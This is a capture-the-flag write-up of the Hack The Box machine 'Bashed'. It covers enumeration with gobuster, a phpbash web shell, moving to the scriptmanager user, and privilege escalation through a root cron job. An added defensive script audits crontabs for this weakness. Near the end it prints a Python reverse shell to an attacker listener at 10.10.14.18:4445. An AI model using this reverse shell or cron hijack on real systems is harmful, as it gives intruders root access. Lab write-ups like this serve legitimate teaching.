Bashed
Port Scanning, General Enumeration and Access (Nmap, Gobuster)
- Reading/Resources
The initial scan showed that the only open port is 80 (HTTP).
Looks like a pretty neat tool, but not a lot to go on.
gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php
Gobuster turned up /dev, and there it is: the phpbash thing!
Privesc (php reverse shell, python, cronjobs)
- Reading/Resources
We can upload files to the /uploads directory in the webroot.
Let's get a real shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Easy enough to switch to scriptmanager:
sudo -u scriptmanager /bin/bash
There's a scripts folder owned by scriptmanager.
Interesting, the python script is ours, but the text file is owned by root?
I see, so the script runs and creates that file.
Moving the old test.txt to test.txt.bak and re-running the script, we can see that the new test.txt is owned by us. That leads me to believe that something with root privs ran it before. Maybe a cronjob? Let's test.
It’s back and with root privs!
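The root cause here is a root cron job executing whatever sits in a directory owned by a non-root user. As an added example (not code from the original writeup), the small audit below parses /etc/crontab-style entries and flags every path a root job references that is owned by a non-root uid or is group/world writable; the sample crontab, the hypothetical uid 1001 standing in for scriptmanager, and the fake_stat helper are constructed assumptions, not the box's real files.

```python
import os
import re
import stat

# /etc/crontab and /etc/cron.d format: five schedule fields (or an @keyword), run-as user, command.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
ABS_PATH = re.compile(r"(?<![\w-])/[\w./-]*")

def parse_system_crontab(text):
    """Yield (user, command) for active job lines; comments and VAR=value lines are skipped."""
    for line in text.splitlines():
        words = line.split()
        if not words or words[0].startswith("#") or "=" in words[0]:
            continue
        if m := CRON_LINE.match(line):
            yield m.group("user"), m.group("cmd")

def find_risky_root_jobs(text, stat_fn=os.stat):
    """Return [(path, reason)] for paths a root job touches that a non-root user could modify."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        if user != "root":
            continue
        for path in ABS_PATH.findall(cmd):
            try:
                st = stat_fn(path)
            except OSError:
                continue  # path absent: nothing a local user can edit (yet)
            if st.st_uid != 0:
                findings.append((path, "owned by uid %d, not root" % st.st_uid))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, "group/world writable"))
    return findings

# Constructed sample crontab and file metadata (not the box's real files); uid 1001 stands in for scriptmanager.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * *  root  cd / && run-parts --report /etc/cron.hourly
* * * * *   root  cd /scripts; for f in *.py; do python "$f"; done
"""
SAMPLE_META = {"/": (0o40755, 0), "/etc/cron.hourly": (0o40755, 0), "/scripts": (0o40755, 1001)}

def fake_stat(path):  # os.stat stand-in over SAMPLE_META so the audit runs offline
    if path not in SAMPLE_META:
        raise FileNotFoundError(path)
    mode, uid = SAMPLE_META[path]
    return os.stat_result((mode, 0, 0, 1, uid, uid, 0, 0, 0, 0))

if __name__ == "__main__":
    print(find_risky_root_jobs(SAMPLE_CRONTAB, fake_stat))
```

Running it against the real files is a matter of passing the contents of /etc/crontab (and each file in /etc/cron.d) with the default os.stat.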
Let's give this boring old test.py some fangs.
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.18",4445))  # attacker's listener (missing closing quote fixed)
os.dup2(s.fileno(),0)  # stdin
os.dup2(s.fileno(),1)  # stdout
os.dup2(s.fileno(),2)  # stderr
pty.spawn("/bin/bash")
I created the new test.py on my machine and transferred it over. Started a listener and…